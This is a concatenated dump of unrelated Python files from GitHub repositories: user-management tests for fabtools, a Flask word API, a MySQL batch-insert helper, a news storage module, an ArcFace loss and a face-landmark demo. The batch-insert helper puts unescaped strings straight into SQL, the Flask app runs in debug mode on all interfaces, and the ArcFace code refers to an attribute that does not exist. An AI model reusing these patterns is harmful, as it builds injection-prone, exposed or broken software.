'commodity_number': self.commodity_number,\n 'operation_date': self.operation_date,\n 'category': self.category,\n 'self_id': self.self_id,\n 'update_status': self.update_status,\n 'replaced': self.replaced,\n }\n\n @classmethod\n def from_dict(cls, data: dict):\n return Equipment(\n toir_id=data.get('toir_id'),\n level=data.get('level'),\n parent_toir_id=data.get('parent_toir_id'),\n name=data.get('name'),\n operating=data.get('operating'),\n departament=data.get('departament_id'),\n typical_object=data.get('object_type_id'),\n toir_url=data.get('toir_url'),\n tech_number=data.get('tech_number'),\n registration_number=data.get('registration_number'),\n commodity_producer=data.get('commodity_producer'),\n commodity_number=data.get('commodity_number'),\n operation_date=data.get('operation_date'),\n self_id=data.get('self_id'),\n category=data.get('category'),\n replaced=data.get('replaced'),\n object_type='equipment',\n )\n","repo_name":"sdregster/toir_integration","sub_path":"domain/entities/equipment.py","file_name":"equipment.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25653574321","text":"import os\n\nfrom fabric.api import run\n\n\nfrom fabtools.files import is_dir\nfrom fabtools.utils import run_as_root\n\n\ndef test_create_user_without_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user1', create_home=False)\n\n assert exists('user1')\n assert not is_dir('/home/user1')\n\n finally:\n run_as_root('userdel -r user1', warn_only=True)\n\n\ndef test_create_user_with_default_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user2')\n\n assert exists('user2')\n assert is_dir('/home/user2')\n\n finally:\n run_as_root('userdel -r user2', warn_only=True)\n\n\ndef test_create_user_with_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user3', home='/tmp/user3')\n\n assert exists('user3')\n assert not is_dir('/home/user3')\n assert is_dir('/tmp/user3')\n\n finally:\n run_as_root('userdel -r user3', warn_only=True)\n\n\ndef test_create_system_user_without_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user4', system=True)\n\n assert exists('user4')\n assert not is_dir('/home/user4')\n\n finally:\n run_as_root('userdel -r user4', warn_only=True)\n\n\ndef test_create_system_user_with_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user5', system=True, create_home=True, home='/var/lib/foo')\n\n assert exists('user5')\n assert is_dir('/var/lib/foo')\n\n finally:\n run_as_root('userdel -r user5', warn_only=True)\n\n\ndef test_create_two_users_with_the_same_uid():\n\n from fabtools.user import create, exists\n\n create('user6', uid='2000')\n assert exists('user6')\n\n create('user7', uid='2000', non_unique=True)\n assert exists('user7')\n\n uid6 = int(run(\"id -u user6\"))\n uid7 = int(run(\"id -u user7\"))\n assert uid7 == uid6 == 2000\n\n run_as_root('userdel -r user6')\n assert not exists('user6')\n\n run_as_root('userdel -r user7')\n assert not exists('user7')\n\n\ndef test_require_user_without_home():\n\n from fabtools.require import user\n from fabtools.user import exists\n\n try:\n user('req1', create_home=False)\n\n assert exists('req1')\n assert not is_dir('/home/req1')\n\n # require again\n user('req1')\n\n finally:\n run_as_root('userdel -r req1', warn_only=True)\n\n\ndef test_require_user_with_default_home():\n\n from fabtools.require import user\n from fabtools.user import exists\n\n try:\n user('req2', create_home=True)\n\n assert exists('req2')\n assert is_dir('/home/req2')\n\n finally:\n run_as_root('userdel -r req2', warn_only=True)\n\n\ndef test_require_user_with_custom_home():\n\n from fabtools.require import user\n from fabtools.user import exists\n\n try:\n user('req3', home='/home/other')\n\n assert exists('req3')\n assert not is_dir('/home/req3')\n assert is_dir('/home/other')\n\n finally:\n run_as_root('userdel -r req3', warn_only=True)\n\n\ndef test_require_user_with_ssh_public_keys():\n\n from fabtools.user import authorized_keys\n from fabtools.require import user\n\n try:\n tests_dir = os.path.dirname(os.path.dirname(__file__))\n public_key_filename = os.path.join(tests_dir, 'id_test.pub')\n public_key_filename2 = os.path.join(tests_dir, 'id_test2.pub')\n multiple_public_key_filename = \\\n os.path.join(tests_dir, 'test_authorized_keys')\n\n with open(public_key_filename) as public_key_file:\n public_key = public_key_file.read().strip()\n\n with open(public_key_filename2) as public_key_file:\n public_key2 = public_key_file.read().strip()\n\n user('req4', home='/tmp/req4', ssh_public_keys=public_key_filename)\n\n keys = authorized_keys('req4')\n assert keys == [public_key]\n\n # let's try add same keys second time\n user('req4', home='/tmp/req4', ssh_public_keys=public_key_filename)\n\n keys = authorized_keys('req4')\n\n # Now add a file with multiple public keys\n user('req5', home='/tmp/req5',\n ssh_public_keys=multiple_public_key_filename)\n\n keys = authorized_keys('req5')\n assert keys == [public_key, public_key2], keys\n\n # Now adding them individually or again shouldn't affect anything\n user('req5', home='/tmp/req5', ssh_public_keys=[\n public_key_filename2,\n public_key_filename,\n multiple_public_key_filename\n ])\n\n keys = authorized_keys('req5')\n assert keys == [public_key, public_key2], keys\n\n finally:\n run_as_root('userdel -r req4', warn_only=True)\n","repo_name":"fabtools/fabtools","sub_path":"fabtools/tests/functional_tests/test_users.py","file_name":"test_users.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","stars":1258,"dataset":"github-code","pt":"76"} +{"seq_id":"35586447740","text":"from flask_api import FlaskAPI\nimport random\n\napp = FlaskAPI(__name__)\n\nkelimeler =[]\nwith open('static/kelimeler.txt',encoding='utf-8') as fd:\n for kelime in fd:\n kelimeler.append(kelime.strip())\n\ndef get_random_kelime(say):\n if say is None: n = 1\n else: n = say\n if n<1: n = 1\n elif n>10: n = 10\n\n sayilar = []\n for m in range(n):\n sayilar.append(random.randrange(len(kelimeler)))\n\n kelimelist=[]\n for m in range(n):\n kelimelist.append(kelimeler[sayilar[m]])\n return kelimelist\n \ndef kelime_yolla():\n return {\n\t'sayı': 0,\n 'text': get_random_kelime(1)[0]\n }\n\n@app.route(\"/\", methods=['GET'])\ndef bos_kelime_listesi():\n liste = {'0':'Lütfen doğru parametre girin'}\n return liste\n\n@app.route(\"//\", methods=['GET'])\ndef kelime_listesi(key):\n kelimelist = get_random_kelime(key)\n liste = {}\n for i in range(len(kelimelist)):\n liste[i]=kelimelist[i]\n return liste\n\n@app.route(\"/kelime/\", methods=['GET'])\ndef tek_kelime():\n return kelime_yolla()\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=11713,debug=True)\n\n","repo_name":"ahmetax/derlemtr","sub_path":"apim.py","file_name":"apim.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"tr","doc_type":"code","stars":39,"dataset":"github-code","pt":"76"} +{"seq_id":"16162974490","text":"\nclass BatchInsert(object):\n\t\"\"\"Helper to do batch inserts\"\"\"\n\t\n\tdef __init__(self, cursor, table, columns = None, batch_size = 1000, lock_table = None):\n\t\tself.__cursor = cursor\n\t\tself.table = table\n\t\tself.columns = columns\n\n\t\tif columns is not None:\n\t\t\tself.__insert_sql = u\"INSERT INTO {} ({}) VALUES\".format(table, \", \".join(columns))\n\t\telse:\n\t\t\tself.__insert_sql = u\"INSERT INTO {} VALUES\".format(table)\n\n\t\tself.batch_size = batch_size\n\n\t\tif lock_table is not None:\n\t\t\tlock_table = lock_table.upper()\n\t\t\tif lock_table not in [\"READ\", \"WRITE\"]:\n\t\t\t\traise Exception(\"lock_table should be one of READ or WRITE\")\n\t\t\n\t\tself.lock_table = lock_table\n\n\t\tself.count = 0\n\t\tself.__sql = []\n\n\t\tif self.lock_table is not None:\n\t\t\tself.__cursor.execute(\"LOCK TABLES {} {}\".format(self.table, self.lock_table))\n\n\tdef __execute(self):\n\t\tif len(self.__sql) == 0:\n\t\t\treturn\n\n\t\tsql = u\"\".join(self.__sql).encode(\"utf-8\", \"replace\")\n\t\t#print sql\n\n\t\tself.__cursor.execute(sql)\n\t\t#print \"Affected rows: {0}\".format(self.__cursor.rowcount)\n\n\tdef __marshall_data(self, data):\n\t\tsb = []\n\t\tfor v in data:\n\t\t\tif v is None:\n\t\t\t\tsb += [u\"NULL\"]\n\t\t\telif isinstance(v, basestring):\n\t\t\t\tsb += [u\"'\" + v + u\"'\"]\n\t\t\telse:\n\t\t\t\tsb += [str(v)]\n\n\t\treturn u\",\".join(sb)\n\n\tdef insert(self, *data):\n\t\tif self.count % self.batch_size == 0:\n\t\t\tself.__execute()\n\n\t\t\tself.__sql = [self.__insert_sql, u\"\\n\\t(\", self.__marshall_data(data), u\")\"]\n\t\telse:\n\t\t\tself.__sql += [u\",\\n\\t(\", self.__marshall_data(data), u\")\"]\n\n\t\tself.count += 1\n\n\tdef close(self):\n\t\tself.__execute()\n\n\t\tif self.lock_table is not None:\n\t\t\tself.__cursor.execute(\"UNLOCK TABLES\")","repo_name":"chris-zen/phd-thesis","sub_path":"chapter2/intogen-arrays/lib/intogen/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42250209890","text":"# Contenedor de temperáturas\nTemMaxList = []\nTemMinList = []\n# contador de días\ndias = 0\ndiasMinErr = 0\ndiasMaxErr = 0\ndiasTwoErr = 0\ndiasErr = 0\n# Medias\nMediaTempMax = 0\nMediaTempMin = 0\n# Promedio días errados\ndiasErrProm = 0\n\n# Capturando datos para comparación de while\nTempMax = int(input('Ingresa la temperatura máxima: '))\nTempMin = int(input('Ingresa la temperatura mínima: '))\n\n# while ciclo repetitivo\nwhile TempMax != 0 and TempMin != 0:\n # Almacenando datos en las listas\n TemMaxList.append(TempMax)\n TemMinList.append(TempMin)\n # Contador de número de días\n dias += 1\n # Capturando datos para no quedar en ciclo infinito\n TempMax = int(input('Ingresa la temperatura máxima: '))\n TempMin = int(input('Ingresa la temperatura mínima: '))\n\n# for que iterara las dos listas, ZIP es una función de python que une las dos listas y muestra el resultado como\n# tupla en el orden que se requiera\nfor i in zip(TemMaxList, TemMinList):\n\n if i[0] > 35 and i[1] >= 5:\n diasMaxErr += 1\n elif i[0] <= 35 and i[1] < 5:\n diasMinErr += 1\n elif i[0] > 35 and i[1] < 5:\n diasTwoErr += 1\n else:\n MediaTempMin = MediaTempMin + i[1]\n MediaTempMax = MediaTempMax + i[0]\n\n# DIAS TOTALES DE ERROR\ndiasErr = diasMinErr + diasMaxErr + diasTwoErr\n\n# MEDIA TEMPERATURAS\nMediaTempMax = MediaTempMax/(dias-diasErr)\nMediaTempMin = MediaTempMin/(dias-diasErr)\n\n# PROMEDIO ERROR CON RESPECTO AL TOTAL DE DÍAS\ndiasErrProm = (diasErr/dias)*100\n\nprint(dias)\nprint(diasErr)\nprint(diasMinErr)\nprint(diasMaxErr)\nprint(diasTwoErr)\nprint(MediaTempMax)\nprint(MediaTempMin)\nprint(diasErrProm)","repo_name":"Camilo-Arias/KnowingPython","sub_path":"retoS4.py","file_name":"retoS4.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2824666049","text":"from PyQt5 import QtCore\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QPushButton\n\nfrom Exceling.globals.colors import ColorsBackend\nfrom Exceling.logo.Logo import Frame\nfrom Exceling.settings.changeColors import ChangeColors\n\n\nclass LeftButtons(QWidget):\n def __init__(self, parent):\n super().__init__(parent)\n\n mainLayout = QVBoxLayout()\n colors = ColorsBackend().sidebar()\n btn1 = Button(self, parent, colors, \"Recent\")\n btn2 = Button(self, parent, colors, \"Add\")\n btn3 = Button(self, parent, colors, \"About\")\n self.buttons = [btn1, btn2, btn3]\n mainLayout.addWidget(Frame(\"Image1\", 80, 80, 5, 5, 5, 10), alignment=QtCore.Qt.AlignHCenter)\n mainLayout.addWidget(btn1)\n mainLayout.addWidget(btn2)\n mainLayout.addWidget(btn3)\n mainLayout.setSpacing(0)\n mainLayout.addStretch(5)\n mainLayout.setContentsMargins(0, 0, 0, 0)\n self.setContentsMargins(0, 0, 0, 0)\n\n self.setLayout(mainLayout)\n\n\nclass Button(QPushButton):\n def __init__(self, parent, grandparent, color, text):\n super().__init__(parent)\n self.grandparent = grandparent\n bg, textC, focused, hover = color\n self.setObjectName(\"rightButtons\")\n self.setText(text)\n self.bg = bg\n self.textC = textC\n self.hover = hover\n self.focused = focused\n self.parent = parent\n self.change = ChangeColors(\"sidebar()\")\n self.setFont(QFont(\"Arial\", 17))\n self.setMinimumSize(90, 30)\n\n self.setContentsMargins(0, 0, 0, 0)\n if text != \"Recent\":\n self.setStyleSheet(\n self.getStyle(bg, textC, hover)\n )\n else:\n self.setStyleSheet(self.getStyle(focused, textC, focused))\n\n def getStyle(self, bg, text, hover):\n return \"\"\"\n #rightButtons {{\n border: none;\n background: {};\n color: {};\n }}\n #rightButtons:hover {{\n background: {};\n }}\n \"\"\".format(bg, text, hover)\n\n def mousePressEvent(self, e):\n super().mousePressEvent(e)\n for button in self.parent.buttons:\n button.setStyleSheet(self.getStyle(self.bg, self.textC, self.hover))\n self.setStyleSheet(self.getStyle(self.focused, self.textC, self.focused))\n if self.text() == \"Recent\":\n self.grandparent.firstTab()\n\n def mouseDoubleClickEvent(self, event):\n if not self.change.isVisible():\n self.change.show()\n","repo_name":"Arya-Programmer/Excel-Automation","sub_path":"Exceling/settings/leftButtons.py","file_name":"leftButtons.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70866394485","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis class is inspired by ROI3DSnake.java class of bigsnake3d plugin\nfrom Biomedical Imaging Group. \n\nDesigned to be run in Python 3 virtual environment 3.7_vtk\n\nRendering of a Snake surface in VTK\n\n@version: June 10, 2019\n@author: Yoann Pradat\n\"\"\"\n\nfrom vtk import vtkRenderer\nfrom vtk import vtkRenderWindow\nfrom vtk import vtkRenderWindowInteractor\n\nfrom auxiliary.auxVtk import *\n\nclass ROI3DSnake(object):\n def __init__(self, snake, scaleSubsampling=1):\n self.snake = snake\n self.scaleSubsampling = scaleSubsampling\n\n self.pixelSizeX = 1\n self.pixelSizeY = 1\n self.pixelSizeZ = 1\n\n # vtkRenderer\n self.renderer = vtkRenderer()\n\n def _getScaledPoints(self, coordinates, scaleX, scaleY, scaleZ):\n \"\"\"\n Parameters\n ----------\n coordinates: np.array (n_coordinates, 3)\n scaleX, scaleY, scaleZ: int\n \n Return\n ---------\n result: vktPoints vector of size (n_coordinates*3, 1)\n \"\"\"\n n_coordinates = coordinates.shape[0]\n result = vtkPoints()\n if n_coordinates < 1:\n return result\n coordinatesVector = np.zeros((n_coordinates*3, 1), dtype=float)\n for i in range(n_coordinates):\n coordinatesVector[3*i, 0] = coordinates[i, 0]*scaleX\n coordinatesVector[3*i+1, 0] = coordinates[i, 1]*scaleY\n coordinatesVector[3*i+2, 0] = coordinates[i, 2]*scaleZ\n \n # vtkDoubleArray\n array = vtk_np.numpy_to_vtk(coordinatesVector)\n array.SetNumberOfComponents(3)\n result.SetData(array)\n return result\n\n def _nodeToWorldScale(self, coordinates, scaleX, scaleY, scaleZ):\n scaledPoint = np.array([coordinates[0]*scaleX, coordinates[1]*scaleY, coordinates[2]*scaleZ])\n return scaledPoint\n\n def _createNodesActors(self, renderer):\n nodes = self.snake.getNodes()\n for i in range(0, len(nodes)):\n if nodes[i].hidden:\n pass\n else:\n # Create sphere at nodes coordinates\n sphereNode = vtkSphereSource()\n nodePos = nodes[i].getCoordinates()\n sphereNode.SetCenter(self._nodeToWorldScale(nodePos, self.pixelSizeX, self.pixelSizeY, self.pixelSizeZ))\n\n sphereNode.SetRadius(self.pixelSizeX/50)\n sphereNode.SetThetaResolution(25)\n sphereNode.SetPhiResolution(25)\n\n sphereNode.Update()\n\n # Get vtkPolyData from sphere\n nodeData = sphereNode.GetOutput()\n\n # Set nodeData to mapper\n nodeMapper = vtkPolyDataMapper()\n nodeMapper.SetInputData(nodeData)\n\n # Set nodeMapper to actor and add actor to the renderer\n nodeActor = vtkActor()\n \n color = nodes[i].getColor()\n red = color.getRed()\n green = color.getGreen()\n blue = color.getBlue()\n nodeActor.GetProperty().SetColor(red/255., green/255., blue/255.)\n\n nodeActor.SetMapper(nodeMapper)\n renderer.AddActor(nodeActor)\n\n def _init3DRenderer(self, renderer):\n scales = self.snake.getScales()\n for i in range(0, len(scales), self.scaleSubsampling):\n scale = scales[i]\n scalePoints = scale.getCoordinates()\n\n # Scale points and Python conversion to vktPoints and scaling\n points = self._getScaledPoints(scalePoints, self.pixelSizeX, self.pixelSizeY, self.pixelSizeZ)\n\n cells = vtkCellArray()\n num_segments = scalePoints.shape[0]-1\n \n if scale.isClosed():\n num_segments += 1\n \n lineIdx = np.zeros((num_segments, 2), dtype=np.int32)\n for j in range(num_segments):\n lineIdx[j] = [j, j+1]\n\n if scale.isClosed():\n lineIdx[num_segments-1] = [0, num_segments-1]\n\n # Create cells and Python conversion to vktCellArray\n cells = getCells(num_segments, prepareCells(lineIdx))\n scaleData = vtkPolyData()\n\n # Set vertices and lines to scaleData\n scaleData.SetPoints(points)\n scaleData.SetLines(cells)\n\n # Set scaleData to mapper\n polyMapper = vtkPolyDataMapper()\n polyMapper.SetInputData(scaleData)\n\n # Set mapper to actor and add actor to the renderer\n lineActor = vtkActor()\n\n color = scale.getColor()\n red = color.getRed()\n green = color.getGreen()\n blue = color.getBlue()\n lineActor.GetProperty().SetColor(red/255., green/255., blue/255.)\n \n lineActor.SetMapper(polyMapper)\n renderer.AddActor(lineActor)\n\n # display control points on 3D vtk renderer\n self._createNodesActors(renderer)\n\n painter3Dintialized=True\n\n def displaySnake(self, renWinSize=(900, 900)):\n # Creates vtkRenderWindow and set size\n renWin = vtkRenderWindow()\n renWin.SetSize(renWinSize[0], renWinSize[1])\n \n # Creates interactive window\n iren = vtkRenderWindowInteractor()\n iren.SetRenderWindow(renWin)\n\n # Add actors to the renderer\n self._init3DRenderer(self.renderer)\n\n # Add renderer to the window\n renWin.AddRenderer(self.renderer)\n\n # Set Background and camera parameters\n self.renderer.SetBackground(1, 1, 1)\n self.renderer.GetActiveCamera().SetFocalPoint(0, 0, 0)\n self.renderer.GetActiveCamera().SetPosition(1, 0, 0)\n self.renderer.GetActiveCamera().SetViewUp(0, 0, 1)\n self.renderer.ResetCamera()\n self.renderer.GetActiveCamera().Azimuth(20)\n self.renderer.GetActiveCamera().Elevation(30)\n self.renderer.GetActiveCamera().Dolly(1.2)\n self.renderer.ResetCameraClippingRange()\n \n iren.Initialize()\n renWin.Render()\n iren.Start()\n renWin.Render()\n \n","repo_name":"ypradat/EbiUhlmann","sub_path":"source/python/roi/ROI3DSnake.py","file_name":"ROI3DSnake.py","file_ext":"py","file_size_in_byte":6143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37444210162","text":"import json\nimport logging\nimport os\nfrom datetime import datetime\nfrom flask_sqlalchemy_cache import FromCache\nfrom houraiteahouse.storage import auth_storage as auth\nfrom houraiteahouse.storage import storage_util as util\nfrom houraiteahouse.storage import models\nfrom houraiteahouse.storage.models import db, cache\nfrom werkzeug.exceptions import Forbidden\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_LANGUAGE = 'en_US'\n\n\ndef sanitize_body(body):\n return body.replace('\\n', '
    ') # replace linebreaks with HTML breaks\n\n\ndef get_language(language=DEFAULT_LANGUAGE):\n try:\n lang = models.Language.get(language_code=language)\n except Exception:\n logger.warning('Unrecognized language code {}'.format(language))\n lang = models.Language.get(language_code=DEFAULT_LANGUAGE)\n return lang\n\n\ndef list_news(language=DEFAULT_LANGUAGE):\n news = models.NewsPost.query.order_by(models.NewsPost.created.desc()) \\\n .options(FromCache(cache)).all()\n if news is None:\n return None\n return [news_to_dict(post, language=language) for post in news]\n\n\ndef open_news_file(postId, language=DEFAULT_LANGUAGE, filemode='r'):\n post_path = os.path.join('/var/htwebsite/news/', language, postId)\n return open(post_path, filemode)\n\n\ndef tagged_news(tag, language=DEFAULT_LANGUAGE):\n tag = models.NewsTag.get(name=tag)\n if tag is None or tag.news is None:\n return None\n return [news_to_dict(post, language=language) for post in tag.news]\n\n\n# \"postId\" is a misnomer, it's actually the short title\n# (ie, [date]-shortened-title)\ndef get_news(postId, session_id, language=DEFAULT_LANGUAGE):\n news = models.NewsPost.get_or_die(post_short=postId)\n caller = None\n if session_id:\n caller = auth.get_user_session(session_id).user\n\n ret = news_to_dict(news, caller, language)\n\n # TODO(james7132): Make this configurable\n with open_news_file(postId, language=language) as news_file:\n ret['body'] = news_file.read()\n\n return ret\n\n\ndef post_news(title, body, tags, session_id, media=None,\n language=DEFAULT_LANGUAGE):\n lang = get_language(language)\n\n tagObjs = [get_tag(name) for name in tags]\n\n author = auth.get_user_session(session_id).user\n if not author:\n return None\n\n body = sanitize_body(body)\n\n created = datetime.utcnow()\n shortTitle = readDate(created) + '-' + title.replace(' ', '-')[:53]\n with open_news_file(shortTitle, language, filemode='w') as news_file:\n news_file.write(body)\n\n news = models.NewsPost(shortTitle, title, created, author, tagObjs, media)\n\n postTitle = models.NewsTitle(news, lang, title)\n\n util.try_add(news=news, logger=logger)\n return get_news(shortTitle, session_id, language)\n\n\ndef edit_news(post_id, title, body, session_id, media,\n language=DEFAULT_LANGUAGE):\n news = models.NewsPost.get_or_die(post_short=post_id)\n caller = auth.get_user_session(session_id).user\n if caller != news.author:\n raise Forbidden\n\n body = sanitize_body(body)\n\n with open_news_file(news.post_short, language, filemode='w') as news_file:\n news_file.write(body)\n\n news.title = title\n news.media = media\n news.lastEdit = datetime.utcnow()\n\n ret = news_to_dict(news, caller)\n\n util.try_merge(news=news, logger=logger)\n ret['body'] = body\n return ret\n\n\ndef translate_news(post_id, language, title, body):\n news = models.NewsPost.get_or_die(post_short=post_id)\n lang = get_language(language)\n if not lang:\n return None\n\n body = sanitize_body(body)\n\n with open_news_file(news.post_short, language, filemode='w') as news_file:\n news_file.write(body)\n\n ret = False\n title = models.NewsTitle.get(news=news, language=lang)\n if not title:\n title = models.NewsTitle(news, lang, title)\n ret = True\n\n util.try_add(title=title, logger=logger)\n return ret\n\n\ndef get_tag(name):\n tag = models.NewsTag.get(name=name)\n return tag or create_tag(name)\n\n\ndef create_tag(name):\n tag = models.NewsTag(name)\n util.try_add(tag=tag, logger=logger)\n # It won't be in the cache yet, so we must actually load it.\n return tag\n\n\ndef post_comment(post_id, body, session_id):\n news = models.NewsPost.get_or_die(post_short=post_id)\n author = auth.get_user_session(session_id).user\n if not author:\n return None\n ret = {'body': body, 'author': author.username}\n\n body = sanitize_body(body)\n\n comment = models.NewsComment(body, author, news)\n util.try_add(comment=comment, logger=logger)\n return ret\n\n\ndef edit_comment(comment_id, body, session_id):\n comment = models.NewsComment.get_or_die(id=comment_id)\n caller = auth.get_user_session(session_id).user\n if caller != comment.author:\n raise Forbidden\n\n comment.body = sanitize_body(body)\n util.try_merge(comment=comment, logger=logger)\n\n\ndef delete_comment(comment_id, session_id):\n comment = models.NewsComment.get_or_die(id=comment_id)\n caller = auth.get_user_session(session_id).user\n if caller != comment.get_author and not (\n caller.get_permissions().admin or caller.get_permissions().master):\n raise Forbidden\n\n util.try_delete(comment=comment, logger=logger)\n return True\n\n\ndef news_to_dict(news, caller=None, language=DEFAULT_LANGUAGE):\n lang = get_language(language)\n newsDict = {\n 'author': news.author.username,\n 'isAuthor': caller and caller == news.get_author(),\n 'created': str(news.created),\n 'post_id': news.post_short,\n 'tags': [tag.name for tag in news.tags]\n }\n\n title = models.NewsTitle.get(id=news.id, language_id=lang.id)\n newsDict['title'] = title.get_title() or news.title\n\n if news.media:\n newsDict['media'] = news.media\n\n if news.comments:\n newsDict['comments'] = [comment_to_dict(comment, caller)\n for comment in news.comments]\n\n if news.lastEdit:\n newsDict['lastEdit'] = str(news.lastEdit)\n\n return newsDict\n\n\ndef comment_to_dict(comment, caller=None):\n return {\n 'id': comment.comment_id,\n 'author': comment.get_author() .get_username(),\n 'body': comment.body,\n 'isAuthor': caller and caller == comment.get_author()\n }\n\n\ndef readDate(d):\n day = '0' + str(d.day) if d.day < 10 else d.day\n month = '0' + str(d.month) if d.month < 10 else d.month\n return '{0}-{1}-{2}'.format(d.year, month, day)\n","repo_name":"HouraiTeahouse/houraiteahouse.net-backend","sub_path":"src/houraiteahouse/storage/news_storage.py","file_name":"news_storage.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20887986532","text":"# Stolen from ArcFace official implementation (InsightFace) :vvvv\nimport math\nimport torch\n\n\nclass ArcFace(torch.nn.Module):\n\tdef __init__(self, s: float = 64.0, margin: float = 0.5):\n\t\tsuper().__init__()\n\t\tself.scale = s\n\t\tself.margin = margin\n\t\tself.cos_m = math.cos(margin)\n\t\tself.sin_m = math.sin(margin)\n\t\tself.theta = math.cos(math.pi - margin)\n\t\tself.sinmm = math.sin(math.pi - margin) * margin\n\t\tself.easy_margin = False\n\n\tdef forward(self, logits: torch.Tensor, labels: torch.Tensor):\n\t\tindex = torch.where(labels != -1)[0]\n\t\ttarget_logit = logits[index, labels[index].view(-1)]\n\n\t\twith torch.no_grad():\n\t\t\ttarget_logit.arccos_()\n\t\t\tlogits.arccos_()\n\t\t\tfinal_target_logit = target_logit + self.margin\n\t\t\tlogits[index, labels[index].view(-1)] = final_target_logit\n\t\t\tlogits.cos_()\n\t\tlogits = logits * self.s\n\t\treturn logits\n\n\nclass ArcFaceFC(torch.nn.Module):\n\tdef __init__(self, arcface: ArcFace, embedding_size: int, num_classes: int) -> None:\n\t\tsuper().__init__()\n\t\tself.arcface = arcface\n\t\tself.embedding_size = embedding_size\n\t\tself.cross_entropy = torch.nn.CrossEntropyLoss()\n\t\tself.weight = torch.nn.Parameter(torch.normal(0.0, 0.01, [num_classes, embedding_size]))\n\n\tdef forward(self, images: torch.Tensor, labels: torch.Tensor) -> torch.Tensor:\n\t\tlabels.squeeze_()\n\t\tlabels = labels.to(torch.long)\n\n\t\tlabels = labels.view(-1, 1)\n\t\tweight = self.weight\n\n\t\tnorm_embeddings = torch.nn.functional.normalize(images)\n\t\tnorm_weight_activated = torch.nn.functional.normalize(weight)\n\t\tlogits = torch.nn.functional.linear(norm_embeddings, norm_weight_activated)\n\n\t\tlogits = logits.clamp(-1, 1)\n\t\tlogits = self.arcface(logits, labels)\n\t\treturn self.cross_entropy(logits, labels)\n","repo_name":"ArinoJenynof/sorghum100-fgvc9","sub_path":"arcface.py","file_name":"arcface.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24649706738","text":"import numpy as np\nimport torch\nfrom torchvision import transforms\nimport cv2\nimport os\nimport glob\nfrom faceland import FaceLanndInference\nfrom hdface.hdface import hdface_detector\n \n\n# os.environ['CUDA_VISIBLE_DEVICES'] = '0'\ndef main():\n det = hdface_detector(use_cuda=False)\n checkpoint = torch.load('faceland.pth')\n plfd_backbone = FaceLanndInference().cuda()\n plfd_backbone.load_state_dict(checkpoint)\n plfd_backbone.eval()\n plfd_backbone = plfd_backbone.cuda()\n transform = transforms.Compose([transforms.ToTensor()])\n\n num = 0\n\n for img in os.listdir(\"images\"):\n print(img)\n image = cv2.imread(os.path.join(\"images\",img))\n if image is not None:\n\n height, width = image.shape[:2]\n img_det = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n result = det.detect_face(img_det)\n for i in range(len(result)):\n box = result[i]['box']\n cls = result[i]['cls']\n pts = result[i]['pts']\n x1, y1, x2, y2 = box\n # cv2.rectangle(image, (x1, y1), (x2, y2), (255, 255, 0))\n w = x2 - x1 + 1\n h = y2 - y1 + 1\n\n size_w = int(max([w, h])*0.8)\n size_h = int(max([w, h]) * 0.8)\n cx = x1 + w//2\n cy = y1 + h//2\n x1 = cx - size_w//2\n x2 = x1 + size_w\n y1 = cy - int(size_h * 0.4)\n y2 = y1 + size_h\n\n left = 0\n top = 0\n bottom = 0\n right = 0\n if x1 < 0:\n left = -x1\n if y1 < 0:\n top = -y1\n if x2 >= width:\n right = x2 - width\n if y2 >= height:\n bottom = y2 - height\n\n x1 = max(0, int(x1))\n y1 = max(0, int(y1))\n\n x2 = min(width, int(x2))\n y2 = min(height, int(y2))\n cropped = image[y1:y2, x1:x2]\n# print(top, bottom, left, right)\n cropped = cv2.copyMakeBorder(cropped, top, bottom, left, right, cv2.BORDER_CONSTANT, 0)\n\n cropped = cv2.resize(cropped, (112, 112))\n\n input = cv2.resize(cropped, (112, 112))\n input = cv2.cvtColor(input, cv2.COLOR_BGR2RGB)\n input = transform(input).unsqueeze(0).cuda()\n landmarks = plfd_backbone(input)\n pre_landmark = landmarks[0]\n pre_landmark = pre_landmark.cpu().detach().numpy().reshape(-1, 2) * [size_w, size_h]\n cv2.rectangle(image,(x1, y1), (x2, y2),(0,255,0))\n for (x, y) in pre_landmark.astype(np.int32):\n cv2.circle(image, (x1 - left + x, y1 - bottom + y), 2, (255, 0, 255), 2)\n cv2.imwrite(\"results/\"+img,image)\n\n num +=1\n else:\n break\n\n\n # if cv2.waitKey(0) == 27:\n # break\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"midasklr/facelandmarks","sub_path":"demo_img.py","file_name":"demo_img.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"76"} +{"seq_id":"27725366518","text":"import argparse\nimport numpy as np\nimport torch\nimport os\nfrom torch.utils.data import DataLoader\nfrom model import Feedforward, model_a, model_b, model_c, test\nfrom torch.optim import Adam\nfrom torch.utils.data.sampler import Sampler\n\ndef init_args():\n parser = argparse.ArgumentParser(description=None)\n parser.add_argument('-s ', '--save_dir', default='models', 